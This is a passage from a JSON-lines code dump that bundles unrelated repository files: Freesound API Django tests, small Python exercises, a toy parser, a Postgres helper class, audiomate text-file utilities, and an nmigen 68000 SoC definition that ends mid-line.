self.client.get(reverse('apiv2-pack-instance', kwargs={'pk': packs[0].id}))\n self.assertEqual(resp.status_code, 200)\n\n # 200 response on pack instance sounds list\n resp = self.client.get(reverse('apiv2-pack-sound-list', kwargs={'pk': packs[0].id}))\n self.assertEqual(resp.status_code, 200)\n\n # 200 response on pack instance download\n # This test uses a https connection.\n resp = self.client.get(reverse('apiv2-pack-download',\n kwargs={'pk': packs[0].id}), secure=True)\n self.assertEqual(resp.status_code, 200)\n\n def test_oauth2_response_ok(self):\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n client = ApiV2Client.objects.create(user=user, description='',\n name='', url='', redirect_uri='https://freesound.org')\n # Login so api returns session login based responses\n self.client.login(username=user.username, password='testpass')\n\n # 200 response on Oauth2 authorize\n resp = self.client.post(reverse('oauth2_provider:authorize'),\n {'client_id': client.id, 'response_type': 'code'}, secure=True)\n self.assertEqual(resp.status_code, 200)\n\n # 302 response on Oauth2 logout and authorize\n resp = self.client.post(reverse('oauth2_provider:logout_and_authorize'),\n {'client_id': client.id}, secure=True)\n self.assertEqual(resp.status_code, 302)\n\n def test_basic_user_response_ok(self):\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n\n # 200 response on login page\n resp = self.client.get(reverse('api-login'), secure=True)\n self.assertEqual(resp.status_code, 200)\n\n self.client.login(username=user.username, password='testpass')\n\n # 200 response on keys page\n resp = self.client.get(reverse('apiv2-apply'), secure=True)\n self.assertEqual(resp.status_code, 200)\n\n # 302 response on logout page\n resp = self.client.get(reverse('api-logout'), secure=True)\n self.assertEqual(resp.status_code, 302)\n\n\nclass TestAPI(TestCase):\n fixtures = ['licenses']\n\n def test_cors_header(self):\n # Create App to login using token\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n\n c = ApiV2Client(user=user, status='OK', redirect_uri=\"https://freesound.com\",\n url=\"https://freesound.com\", name=\"test\")\n c.save()\n\n sound = sounds[0]\n sound.change_processing_state(\"OK\")\n sound.change_moderation_state(\"OK\")\n\n headers = {\n 'HTTP_AUTHORIZATION': 'Token %s' % c.key,\n 'HTTP_ORIGIN': 'https://www.google.com'\n }\n resp = 
self.client.options(reverse('apiv2-sound-instance',\n kwargs={'pk': sound.id}), secure=True, **headers)\n self.assertEqual(resp.status_code, 200)\n # Check if header is present\n self.assertEqual(resp['ACCESS-CONTROL-ALLOW-ORIGIN'], '*')\n\n def test_encoding(self):\n # Create App to login using token\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n\n c = ApiV2Client(user=user, status='OK', redirect_uri=\"https://freesound.com\",\n url=\"https://freesound.com\", name=\"test\")\n c.save()\n\n sound = sounds[0]\n sound.change_processing_state(\"OK\")\n sound.change_moderation_state(\"OK\")\n\n headers = {\n 'HTTP_AUTHORIZATION': 'Token %s' % c.key,\n }\n # make query that can't be decoded\n resp = self.client.options(\"/apiv2/search/text/?query=ambient&filter=tag:(rain%20OR%CAfe)\", secure=True, **headers)\n self.assertEqual(resp.status_code, 200)\n\n\nclass ApiSearchPaginatorTest(TestCase):\n def test_page(self):\n paginator = ApiSearchPaginator([1, 2, 3, 4, 5], 5, 2)\n page = paginator.page(2)\n\n self.assertEqual(page, {'object_list': [1, 2, 3, 4, 5],\n 'has_next': True,\n 'has_previous': True,\n 'has_other_pages': True,\n 'next_page_number': 3,\n 'previous_page_number': 1,\n 'page_num': 2})\n\n\nclass TestSoundCombinedSearchFormAPI(SimpleTestCase):\n # Query\n def test_query_empty_valid(self):\n for query in [' ', '', '\" \"', '\"\"', \"' '\", \"''\"]:\n form = SoundCombinedSearchFormAPI(data={'query': query})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['query'], '')\n\n # Filter\n def test_filter_empty_invalid(self):\n for filt in ['', ' ']:\n form = SoundCombinedSearchFormAPI(data={'filter': filt})\n with self.assertRaisesMessage(BadRequestException, 'Invalid filter.'):\n self.assertFalse(form.is_valid())\n\n def test_filter_valid(self):\n filt = 'text'\n form = SoundCombinedSearchFormAPI(data={'filter': 'text'})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['filter'], filt)\n\n # Descriptors\n def test_descriptors_empty_valid(self):\n form = SoundCombinedSearchFormAPI(data={})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['descriptors'], '')\n\n def test_descriptors_valid(self):\n descriptors = 'test'\n form = SoundCombinedSearchFormAPI(data={'descriptors': descriptors})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['descriptors'], descriptors)\n\n # Normalized\n def test_normalized_valid(self):\n normalized = '1'\n form = SoundCombinedSearchFormAPI(data={'normalized': normalized})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['normalized'], normalized)\n\n def test_normalized_bogus_valid(self):\n for normalized in ['0', '', 'test']:\n form = SoundCombinedSearchFormAPI(data={'normalized': normalized})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['normalized'], '')\n\n # Page\n def test_page_empty_valid(self):\n form = SoundCombinedSearchFormAPI(data={})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['page'], 1)\n\n def test_page_bogus_valid(self):\n for page in ['', 'test']:\n form = SoundCombinedSearchFormAPI(data={'page': page})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['page'], 1)\n\n # Sort\n def test_sort_empty_valid(self):\n form = SoundCombinedSearchFormAPI(data={})\n self.assertTrue(form.is_valid())\n sort = form.cleaned_data['sort']\n self.assertEqual(len(sort), 1)\n self.assertEqual(sort[0], 'score desc')\n\n def 
test_sort_multiple_valid(self):\n form = SoundCombinedSearchFormAPI(data={'sort': 'rating_desc'})\n self.assertTrue(form.is_valid())\n sort = form.cleaned_data['sort']\n self.assertEqual(sort[0], \"avg_rating desc\")\n self.assertEqual(len(sort), 2)\n self.assertEqual(sort[1], \"num_ratings desc\")\n\n # Normalized\n def test_group_by_pack_valid(self):\n group_by_pack = '1'\n form = SoundCombinedSearchFormAPI(data={'group_by_pack': group_by_pack})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['group_by_pack'], group_by_pack)\n\n def test_group_by_pack_bogus_valid(self):\n for group_by_pack in ['0', '', 'test']:\n form = SoundCombinedSearchFormAPI(data={'group_by_pack': group_by_pack})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['group_by_pack'], '')\n\n # Page size\n def test_page_size_empty_valid(self):\n form = SoundCombinedSearchFormAPI(data={})\n self.assertTrue(form.is_valid())\n self.assertTrue(form.cleaned_data[settings.APIV2['PAGE_SIZE_QUERY_PARAM']], settings.APIV2['PAGE_SIZE'])\n\n def test_page_size_max_valid(self):\n param = settings.APIV2['PAGE_SIZE_QUERY_PARAM']\n form = SoundCombinedSearchFormAPI(data={param: settings.APIV2['MAX_PAGE_SIZE'] + 1})\n self.assertTrue(form.is_valid())\n self.assertTrue(form.cleaned_data[param], settings.APIV2['MAX_PAGE_SIZE'])\n\n # Descriptors filter\n def test_descriptors_filter_empty_invalid(self):\n for descriptors_filter in ['', ' ']:\n form = SoundCombinedSearchFormAPI(data={'descriptors_filter': descriptors_filter})\n with self.assertRaisesMessage(BadRequestException, 'Invalid descriptors_filter.'):\n self.assertFalse(form.is_valid())\n\n def test_descriptors_filter_valid(self):\n descriptors_filter = 'test'\n form = SoundCombinedSearchFormAPI(data={'descriptors_filter': descriptors_filter})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['descriptors_filter'], descriptors_filter)\n\n # Target\n def test_target_empty_invalid(self):\n for target in ['', ' ']:\n form = SoundCombinedSearchFormAPI(data={'target': target})\n with self.assertRaisesMessage(BadRequestException, 'Invalid target.'):\n self.assertFalse(form.is_valid())\n\n def test_target_valid(self):\n target = 'test'\n form = SoundCombinedSearchFormAPI(data={'target': target})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['target'], target)\n\n\nclass TestSoundListSerializer(TestCase):\n\n fixtures = ['licenses', 'sounds']\n\n def setUp(self):\n self.ss = Sound.objects.all()[0:5]\n self.sids = [s.id for s in self.ss]\n self.factory = RequestFactory()\n\n def test_num_fields(self):\n # Test that serializer returns only fields included in fields parameter of the request\n\n sounds_dict = Sound.objects.dict_ids(sound_ids=self.sids)\n\n # When 'fields' parameter is not used, return default ones\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': ''})\n serialized_sound = SoundListSerializer(list(sounds_dict.values())[0], context={'request': dummy_request}).data\n self.assertItemsEqual(serialized_sound.keys(), DEFAULT_FIELDS_IN_SOUND_LIST.split(','))\n\n # When only some parameters are specified\n fields_parameter = 'id,username'\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': fields_parameter})\n serialized_sound = SoundListSerializer(list(sounds_dict.values())[0], context={'request': dummy_request}).data\n self.assertItemsEqual(serialized_sound.keys(), fields_parameter.split(','))\n\n # When all parameters are 
specified\n fields_parameter = ','.join(SoundListSerializer.Meta.fields)\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': fields_parameter})\n serialized_sound = SoundListSerializer(list(sounds_dict.values())[0], context={'request': dummy_request}).data\n self.assertItemsEqual(serialized_sound.keys(), fields_parameter.split(','))\n\n def test_num_queries(self):\n # Test that the serializer does not perform any extra query when serializing sounds regardless of the number\n # of sounds and the number of requested fields. This will be as long as sound object passed to the serializer\n # has been obtained using Sound.objects.dict_ids or Sound.objects.bulk_query_id\n\n # Make sure sound content type and site objects are cached to avoid further queries\n ContentType.objects.get_for_model(Sound)\n Site.objects.get_current()\n\n field_sets = [\n '', # default fields\n ','.join(SoundListSerializer.Meta.fields), # all fields\n ]\n\n # Test when serializing a single sound\n for field_set in field_sets:\n sounds_dict = Sound.objects.dict_ids(sound_ids=self.sids[0])\n with self.assertNumQueries(0):\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': field_set})\n # Call serializer .data to actually get the data and potentially trigger unwanted extra queries\n _ = SoundListSerializer(list(sounds_dict.values())[0], context={'request': dummy_request}).data\n\n # Test when serializing mulitple sounds\n for field_set in field_sets:\n sounds_dict = Sound.objects.dict_ids(sound_ids=self.sids)\n with self.assertNumQueries(0):\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': field_set})\n for sound in sounds_dict.values():\n # Call serializer .data to actually get the data and potentially trigger unwanted extra queries\n _ = SoundListSerializer(sound, context={'request': dummy_request}).data\n\n\nclass TestSoundSerializer(TestCase):\n\n fixtures = ['licenses', 'sounds']\n\n def setUp(self):\n self.sound = Sound.objects.bulk_query_id(Sound.objects.first().id)[0]\n self.factory = RequestFactory()\n\n def test_num_fields_and_num_queries(self):\n\n # Make sure sound content type and site objects are cached to avoid further queries\n ContentType.objects.get_for_model(Sound)\n Site.objects.get_current()\n\n # Test that the serialized sound instance includes all fields in the serializer and does not perform any\n # extra query. 
Because in this test we get sound info using Sound.objects.bulk_query_id, the serializer\n # should perform no extra queries to render the data\n with self.assertNumQueries(0):\n dummy_request = self.factory.get(reverse('apiv2-sound-instance', args=[self.sound.id]))\n serialized_sound = SoundSerializer(self.sound, context={'request': dummy_request}).data\n self.assertItemsEqual(serialized_sound.keys(), SoundSerializer.Meta.fields)\n","repo_name":"CLOUDROG/freesound","sub_path":"apiv2/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":15980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"30056103009","text":"#!/usr/bin/python\nimport math\n\nans = []\nfor i in range(1000,10000):\n num = str(i)\n #check to ensure the number format aabb is met\n if num[0] == num[1] and num[2] == num[3]:\n print('testing',i)\n #check to see make sure the number is a perfect square.\n #the normal root will be equal to the root rounded to any number in this case 5\n if math.sqrt(i)==round(math.sqrt(i),5):\n ans.append(i)\nprint('The number aabb which is a perfect square is' ,ans)\n \n","repo_name":"yoda-of-codas/Number_Theory","sub_path":"number theory 6.py","file_name":"number theory 6.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33136123421","text":"import enum\nfrom os import uname\nfrom typing import Any, List\nfrom lexer import BASE_TOKEN_IDS, Lexer, Token\n\n\nclass Node:\n value: Any\n\n def __init__(self, value, name):\n self.value = value\n self.name = name\n\n def __str__(self) -> str:\n return f\"({self.name}: {self.value})\"\n\n\nclass UnaryNode(Node):\n ...\n\n\nclass BinaryNode(Node):\n def __init__(self, left, right, value):\n self.value = value\n self.left = left\n self.right = right\n\n def __str__(self) -> str:\n return f\"({self.left.value}{self.value}{self.right.value})\"\n\n\nclass Parser:\n tokens: List[Token]\n\n def __init__(self, source):\n self.source = source\n self.pos = 0\n self.lexer = Lexer(source)\n self.tokens = self.lexer.lex()\n self.running = False\n\n def parse(self) -> List[Node]:\n for i, token in enumerate(self.tokens):\n if token.value in BASE_TOKEN_IDS.keys():\n self.tokens[i] = Token(\n BASE_TOKEN_IDS[token.value], token.value\n )\n\n self.running = True\n while self.running:\n yield (self.parse_expr())\n\n @property\n def curr_token(self) -> Token:\n if self.pos < len(self.tokens):\n return self.tokens[self.pos]\n self.running = False\n return Token(\"END\", \"END\")\n\n @property\n def prev_token(self) -> Token:\n if self.pos >= 0:\n return self.tokens[self.pos - 1]\n self.running = False\n return Token(\"END\", \"END\")\n\n @property\n def next_token(self) -> Token:\n if self.pos < len(self.tokens) - 1:\n return self.tokens[self.pos + 1]\n self.running = False\n return Token(\"END\", \"END\")\n\n def parse_func_args(self):\n args = []\n while self.curr_token.id != \"CLOS_PAREN\":\n args.append(self.parse_expr())\n if self.curr_token.id == \"SYMB_COMMA\":\n self.pos += 1\n continue\n else:\n break\n return UnaryNode(args, \"PARAM_LIST\")\n\n def parse_expr(self):\n if self.curr_token.id == \"ITEM\":\n if self.next_token.id == \"OPEN_PAREN\":\n n = BinaryNode(\n UnaryNode(self.curr_token.value, \"ITEM\"),\n Node(\"\", \"\"),\n \"FUNC\",\n )\n self.pos += 2\n n.right = self.parse_func_args()\n if self.curr_token.id == \"CLOS_PAREN\":\n self.pos += 1\n return n\n else:\n if self.curr_token.id 
== \"END\":\n return n\n else:\n raise Exception(\n f\"Expected ')', found {self.curr_token.value} instead\"\n )\n elif self.next_token.id.startswith(\"OPER_\"):\n n = BinaryNode(\n UnaryNode(self.curr_token.value, \"ITEM\"),\n Node(\"\", \"\"),\n self.next_token.id,\n )\n self.pos += 2\n n.right = self.parse_expr()\n return n\n else:\n self.pos += 1\n return UnaryNode(self.prev_token.value, \"ITEM\")\n\n elif self.curr_token.id == \"OPEN_PAREN\":\n self.pos += 1\n expr = self.parse_expr()\n self.pos += 1\n return expr\n\n elif (\n self.curr_token.id == \"NUMBER_LIT\"\n or self.curr_token.id == \"STRING_LIT\"\n ):\n if self.next_token.id.startswith(\"OPER_\"):\n n = BinaryNode(\n UnaryNode(self.curr_token.value, self.curr_token.id),\n UnaryNode(\"\", \"\"),\n self.next_token.id,\n )\n self.pos += 2\n n.right = self.parse_expr()\n return n\n else:\n self.pos += 1\n return UnaryNode(self.prev_token.value, self.prev_token.id)\n\n self.running = False\n","repo_name":"georgemunyoro/boomlang","sub_path":"boom_parser.py","file_name":"boom_parser.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38044351220","text":"#!/usr/bin/env python3\n\n# Imports\nimport sys\nimport random\n\n# Constants\nN = 10\nM = 100\n\n# Command arguments\nseed, send_fd, recv_fd = map(int, sys.argv[1:])\n\n# Seed the RNG\nrandom.seed(seed)\n\n# Open send pipe\nwith open(send_fd, 'w', buffering=1) as send:\n\n # Print number of test cases\n print(N, file=send)\n\n # Open recv pipe\n with open(recv_fd, 'r', buffering=1) as recv:\n\n # Loop over attempts\n for _ in range(N):\n\n # Send input\n a = random.randint(0, M)\n b = random.randint(0, M)\n print(a, b, file=send)\n\n # Check output\n line = recv.readline()\n try:\n assert a + b == int(line)\n except AssertionError:\n print('FAILED')\n except Exception:\n print('ERROR')\n else:\n print('PASSED')\n","repo_name":"vxgmichel/jammin","sub_path":"example/interactive-sum/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30496157425","text":"import os\nimport click\nimport psycopg2\nfrom psycopg2 import sql\nfrom pprint import pprint\nfrom dotenv import load_dotenv\nfrom get_creds import creds\n\n\nclass PGConn:\n def __init__(self):\n self.config = creds()\n self.conn = psycopg2.connect(\n dbname = self.config.get(\"PGDATABASE\"),\n user = self.config.get(\"PGUSER\"),\n password = self.config.get(\"PGPASSWORD\"),\n port = self.config.get(\"PGPORT\"),\n host = self.config.get(\"PGHOST\")\n )\n self.cur = self.conn.cursor()\n\n\n def get_table_rows(self, table):\n try:\n self.cur.execute(\n sql.SQL(\"SELECT * FROM {};\").format(sql.Identifier(table)))\n rows = self.cur.fetchall()\n return rows\n except psycopg2.errors.UndefinedTable:\n click.secho(\"The table {} does not exist\".format(table), fg=\"red\")\n\n\n def insert_customer(self, first_name, last_name, age, gender, email):\n \"\"\"\n Insert a customer with INSERT INTO statement\n \"\"\"\n self.cur.execute(\"\"\"\n INSERT INTO customer (first_name, last_name, age, gender, email) VALUES (%s, %s, %s, %s, %s)\n \"\"\", (first_name, last_name, age, gender, email))\n self.conn.commit()\n\n\n def insert_customer_sp(self, values):\n \"\"\"\n Insert a customer to the table using\n a stored procedure\n \"\"\"\n self.cur.execute(\"CALL create_customer(%s, %s, %s, %s, %s);\", (tuple(values)))\n 
self.conn.commit()\n\n\n def insert_row(self, table, data):\n try:\n print(data)\n print(type(data))\n sql_query = sql.SQL(\"INSERT INTO {} VALUES ({})\".format(sql.Identifier(table), (\"%s,\"*len(data)).rstrip(\",\")), [\"test\", \"test\"])\n print(sql_query)\n self.cur.execute(sql_query)\n self.conn.commit()\n except:\n click.secho(\"Invalid table/data\", fg=\"red\")\n\n \n def exec_query(self, query):\n \"\"\"\n Execute the given query\n \"\"\"\n try:\n self.cur.execute(query)\n try:\n rows = self.cur.fetchall()\n pprint(rows)\n except:\n pass\n except:\n click.secho(\"Invalid query!\", fg=\"red\")\n\n\n def kill(self):\n self.cur.close()\n self.conn.close()\n","repo_name":"daniel-sjkdm/StoreDatabase","sub_path":"python/PGConn.py","file_name":"PGConn.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71503988641","text":"#!/usr/bin/env python3\n\nfrom pprint import pprint\nfrom collections import deque, defaultdict\nimport itertools\nimport math\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.buffer.readline\n\n\n# dp[x] := x を作るのに必要な正四面体数の個数の最小値\n# dp[x] = min(dp[x], dp[x - g(i)] + 1)\n# ここで、i は x <= g(i) を満たす\n\n\ndef g(n):\n return n * (n + 1) * (n + 2) // 6\n\n\ndef fill_dp(dp, odddp):\n i = 1\n while True:\n g_i = g(i)\n if g_i >= max_num:\n break\n for x in range(g_i, max_num):\n dp[x] = min(dp[x], dp[x - g_i] + 1)\n if g_i % 2 == 1:\n odddp[x] = min(odddp[x], odddp[x - g_i] + 1)\n i += 1\n return dp, odddp\n\n\nmax_num = 10 ** 6\ndp = [max_num] * (max_num + 1)\nodddp = [max_num] * (max_num + 1)\n\ndp[0] = 0\nodddp[0] = 0\ndp, odddp = fill_dp(dp, odddp)\n\nwhile True:\n num = int(input())\n if num == 0:\n break\n print(dp[num], odddp[num])\n","repo_name":"d-matsui/atcorder","sub_path":"100-problems/review/dinamic-programming/44-pollock.py","file_name":"44-pollock.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"968199645","text":"from rest_flex_fields import FlexFieldsModelSerializer\nfrom rest_framework import serializers\n\nfrom staff_models.staffs.class_models.staff import Staff\nfrom staff_models.staffs.class_serializers.staff_address_serializers import StaffAddressSerializer\nfrom staff_models.staffs.class_serializers.staff_phone_serializers import StaffPhoneSerializer\n\n\nclass StaffSerializer(FlexFieldsModelSerializer):\n staff_phone = serializers.PrimaryKeyRelatedField(read_only=True, many=True)\n staff_address = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = Staff\n fields = [\n 'id',\n 'url',\n 'name',\n 'is_active',\n 'staff_phone',\n 'staff_address'\n ]\n expandable_fields = {\n 'staff_phone': (StaffPhoneSerializer, {'many': True}),\n 'staff_address': StaffAddressSerializer\n }\n","repo_name":"reimibeta/django-staff-models","sub_path":"staff_models/staffs/class_serializers/staff_serializers.py","file_name":"staff_serializers.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71648077281","text":"\"\"\"\nThe textfile module contains functions\nfor reading and writing textfiles.\n\"\"\"\n\nimport os\n\nfrom audiomate.utils import text\nfrom audiomate import logutil\n\nlogger = logutil.getLogger()\n\n\ndef read_separated_lines(path, separator=' ', max_columns=-1, keep_empty=False):\n \"\"\"\n Reads a text file where 
each line represents a record with some separated columns.\n\n Parameters:\n path (str): Path to the file to read.\n separator (str): Separator that is used to split the columns.\n max_columns (int): Number of max columns (if the separator occurs within the last column).\n keep_empty (bool): If True empty columns are returned as well.\n\n Returns:\n list: A list containing a list for each line read.\n \"\"\"\n\n gen = read_separated_lines_generator(path, separator, max_columns, keep_empty=keep_empty)\n return list(gen)\n\n\ndef read_separated_lines_with_first_key(path: str, separator: str = ' ', max_columns: int = -1,\n keep_empty: bool = False):\n \"\"\"\n Reads the separated lines of a file and return a dictionary with the first column as keys, value\n is a list with the rest of the columns.\n\n Parameters:\n path (str): Path to the file to read.\n separator (str): Separator that is used to split the columns.\n max_columns (str): Number of max columns (if the separator occurs within the last column).\n keep_empty (bool): If True empty columns are returned as well.\n\n Returns:\n dict: Dictionary with list of column values and first column value as key.\n \"\"\"\n gen = read_separated_lines_generator(path, separator, max_columns, keep_empty=keep_empty)\n\n dic = {}\n\n for record in gen:\n if len(record) > 0:\n dic[record[0]] = record[1:len(record)]\n\n return dic\n\n\ndef read_key_value_lines(path, separator=' ', default_value=''):\n \"\"\"\n Reads lines of a text file with two columns as key/value dictionary.\n\n Parameters:\n path (str): Path to the file.\n separator (str): Separator that is used to split key and value.\n default_value (str): If no value is given this value is used.\n\n Returns:\n dict: A dictionary with first column as key and second as value.\n \"\"\"\n gen = read_separated_lines_generator(path, separator, 2)\n\n dic = {}\n\n for record in gen:\n if len(record) > 1:\n dic[record[0]] = record[1]\n elif len(record) > 0:\n dic[record[0]] = default_value\n\n return dic\n\n\ndef write_separated_lines(path, values, separator=' ', sort_by_column=0):\n \"\"\"\n Writes list or dict to file line by line. Dict can have list as value then they written\n separated on the line.\n\n Parameters:\n path (str): Path to write file to.\n values (dict, list): A dictionary or a list to write to the file.\n separator (str): Separator to use between columns.\n sort_by_column (int): if >= 0, sorts the list by the given index, if its 0 or 1 and its a\n dictionary it sorts it by either the key (0) or value (1). 
By default\n 0, meaning sorted by the first column or the key.\n \"\"\"\n with open(path, 'w', encoding='utf-8') as f:\n\n if type(values) is dict:\n if sort_by_column in [0, 1]:\n items = sorted(values.items(), key=lambda t: t[sort_by_column])\n else:\n items = values.items()\n\n for key, value in items:\n if type(value) in [list, set]:\n value = separator.join([str(x) for x in value])\n\n f.write('{}{}{}\\n'.format(key, separator, value))\n elif type(values) is list or type(values) is set:\n if 0 <= sort_by_column < len(values):\n items = sorted(values)\n else:\n items = values\n\n for record in items:\n str_values = [str(value) for value in record]\n\n f.write('{}\\n'.format(separator.join(str_values)))\n\n\ndef read_separated_lines_generator(path, separator=' ', max_columns=-1,\n ignore_lines_starting_with=None, keep_empty=False):\n \"\"\"\n Creates a generator through all lines of a file and returns the splitted line.\n\n Parameters:\n path (str): Path to the file.\n separator (str): Separator that is used to split the columns.\n max_columns (int): Number of max columns (if the separator occurs within the last column).\n ignore_lines_starting_with (list): Lines starting with a string in this list will be ignored.\n keep_empty (bool): If True empty columns are returned as well.\n \"\"\"\n if not os.path.isfile(path):\n logger.error('File doesnt exist or is no file: %s', path)\n return\n\n with open(path, 'r', errors='ignore', encoding='utf-8') as f:\n\n if max_columns > -1:\n max_splits = max_columns - 1\n else:\n max_splits = -1\n\n for line in f:\n if keep_empty:\n stripped_line = line\n else:\n stripped_line = line.strip()\n\n if ignore_lines_starting_with is not None:\n should_ignore = text.starts_with_prefix_in_list(\n stripped_line,\n ignore_lines_starting_with\n )\n else:\n should_ignore = False\n\n if not should_ignore and stripped_line != '':\n record = stripped_line.split(sep=separator, maxsplit=max_splits)\n record = [field.strip() for field in record]\n yield record\n","repo_name":"ynop/audiomate","sub_path":"audiomate/utils/textfile.py","file_name":"textfile.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"54"} +{"seq_id":"4524519588","text":"#!/usr/bin/env python3\n\nfrom nmigen import *\nfrom nmigen.cli import main\nfrom nmigen_soc import wishbone\nfrom nmigen_soc.memory import MemoryMap\nfrom nmigen_boards.ulx3s import *\nfrom nmigen.build.dsl import *\nfrom ao68000.nmigen import ao68000soc\nfrom wb_to_68k import WishboneTo68000\nfrom m68krom import M68KROM, M68KRAM\n\nclass System(Elaboratable):\n def __init__(self):\n self.ao68000soc = ao68000soc()\n self.wb_to_68k = WishboneTo68000(self.ao68000soc.bus, self.ao68000soc.fc, self.ao68000soc.ipl)\n pass\n\n def elaborate(self, platform):\n m = Module()\n m.domains.sync = ClockDomain()\n clk25 = platform.request(\"clk25\")\n m.d.comb += ClockSignal().eq(clk25.i)\n #hack for ao68000 to start up correctly\n m.d.comb += ResetSignal().eq(platform.request(\"button_fire\",0))\n\n platform.add_resources([\n Resource(\"addr\", 0, Pins(\"24+ 25- 25+ 26- 26+ 27- 27+ 0- 0+ 1- 1+ 2- 2+ 3- 3+ 5+ 6- 6+ 7- 7+ 8- 8+ 9-\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"fc\", 0, Pins(\"5- 4+ 4-\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"data\", 0, Pins(\"20+ 20- 19+ 19- 18+ 18- 17+ 17- 13+ 13- 12+ 12- 11+ 11- 10+ 10-\", dir=\"io\", conn=(\"gpio\", 0))),\n #Resource(\"dtack\", 0, Pins(\"9+\", dir=\"i\", conn=(\"gpio\", 0))),\n 
#Resource(\"reset\", 0, Pins(\"22+\", dir=\"i\", conn=(\"gpio\", 0))),\n # changed: move dtack to reset pin because of oops on rev 1 pcb\n # then use original dtack line as data_dir\n Resource(\"dtack\", 0, Pins(\"22+\", dir=\"i\", conn=(\"gpio\", 0))),\n Resource(\"data_dir\", 0, Pins(\"9+\", dir=\"o\", conn=(\"gpio\", 0))),\n Resource(\"ipl\", 0, Pins(\"24- 23+ 23-\", dir=\"i\", conn=(\"gpio\", 0))),\n Resource(\"clk\", 0, Pins(\"22-\", dir=\"i\", conn=(\"gpio\", 0))),\n Resource(\"br\", 0, Pins(\"21+\", dir=\"i\", conn=(\"gpio\", 0))),\n Resource(\"bgack\", 0, Pins(\"21-\", dir=\"i\", conn=(\"gpio\", 0))),\n # bg goes through an open collector inverter\n Resource(\"bg\", 0, Pins(\"16+\", dir=\"o\", conn=(\"gpio\", 0))),\n # addr_dir: 0 = read, 1 = write\n # controls: addr, fc, as, uds, lds, rw\n Resource(\"addr_dir\", 0, Pins(\"16-\", dir=\"o\", conn=(\"gpio\", 0))),\n Resource(\"as_\", 0, Pins(\"15+\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"uds_\", 0, Pins(\"15-\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"rw_\", 0, Pins(\"14+\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"lds_\", 0, Pins(\"14-\", dir=\"io\", conn=(\"gpio\", 0)))\n ])\n\n timer = Signal(24)\n m.d.sync += timer.eq(timer + 1)\n\n m.submodules.ao68000soc = self.ao68000soc\n\n m.d.comb += self.wb_to_68k.dtack_.eq(0)\n m.submodules.wb_to_68k = self.wb_to_68k\n\n plat_data = platform.request(\"data\", 0)\n data_dir = platform.request(\"data_dir\")\n\n leds = [platform.request(\"led\", i) for i in range(0,8)]\n for i in range(0, 8):\n m.d.comb += leds[i].eq(self.ao68000soc.bus.adr[i+15])\n\n bus_assert = self.wb_to_68k.bus_assert\n\n m.d.comb += platform.request(\"bg\").o.eq(~self.wb_to_68k.bg_)\n\n # section of signals controlled by rw_\n m.d.comb += plat_data.o.eq(self.wb_to_68k.o_data)\n m.d.comb += self.wb_to_68k.i_data.eq(plat_data.i)\n with m.If(~self.wb_to_68k.rw_ & bus_assert):\n m.d.comb += plat_data.oe.eq(0xFFFF)\n m.d.comb += data_dir.o.eq(1)\n with m.Else():\n m.d.comb += plat_data.oe.eq(0)\n m.d.comb += data_dir.o.eq(0)\n\n # section of signals controlled by bus_assert\n m.d.comb += platform.request(\"addr_dir\").o.eq(bus_assert)\n addr = platform.request(\"addr\", 0)\n fc = platform.request(\"fc\", 0)\n as_ = platform.request(\"as_\")\n uds_ = platform.request(\"uds_\")\n lds_ = platform.request(\"lds_\")\n rw_ = platform.request(\"rw_\")\n m.d.comb += addr.o.eq(self.wb_to_68k.addr)\n m.d.comb += addr.oe.eq(bus_assert)\n m.d.comb += fc.o.eq(self.ao68000soc.fc)\n m.d.comb += fc.oe.eq(bus_assert)\n m.d.comb += 